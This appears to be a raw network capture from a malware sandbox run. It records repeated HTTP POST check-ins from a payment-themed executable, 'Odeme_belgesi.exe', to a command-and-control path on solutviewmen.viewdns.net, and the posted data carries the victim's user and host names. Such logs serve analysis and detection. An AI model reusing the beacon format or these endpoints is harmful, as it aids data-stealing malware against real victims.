Oct 1, 2024 10:55:55.793611050 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:56.438821077 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49790	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:56.586863041 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:56.591639996 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:57.288909912 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49791	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:57.447319031 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:57.452107906 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:58.586699009 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49792	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:58.757473946 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:58.764642000 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:55:59.517257929 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49793	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:55:59.675770998 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:55:59.680644989 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:00.358503103 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49794	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:00.508444071 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:00.513320923 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:10.260781050 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49795	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:10.434482098 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:10.439429045 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:11.179004908 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49796	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:11.349014997 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:11.353854895 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:12.004467010 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49797	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:12.177352905 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:12.182284117 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:12.873409033 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49798	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:13.043592930 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:13.048624039 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:13.732716084 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49799	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:13.906301022 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:13.911144018 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:14.662214041 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49800	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:14.808928013 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:14.813721895 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:15.549448013 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49801	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:15.702488899 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:15.707474947 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:16.583683014 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49802	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:16.753540993 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:16.758460045 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:17.493792057 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49803	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:17.784352064 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:17.789424896 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:21.570405960 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49804	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:21.724112034 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:21.729047060 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:22.785677910 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49805	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:22.927316904 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:22.932406902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:23.757464886 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49806	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:23.909893990 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:23.914706945 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:27.643047094 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:26:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49807	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:27.785759926 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:27.790640116 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:28.561955929 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49808	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:28.712415934 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:28.717307091 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:29.396918058 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49809	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:29.543512106 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:29.548372030 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
Oct 1, 2024 10:56:30.238183975 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.10.3 Date: Mon, 30 Sep 2024 22:27:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.3 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49810	45.66.231.242	80	7124	C:\Users\user\Desktop\Odeme_belgesi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 10:56:30.398751020 CEST	259	OUT	POST /bdifygidj/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: solutviewmen.viewdns.net Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F1FA537E Content-Length: 149 Connection: close
Oct 1, 2024 10:56:30.403711081 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 39 00 36 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones965969JONES-PC0FDD42EE188E931437F4FBE2C
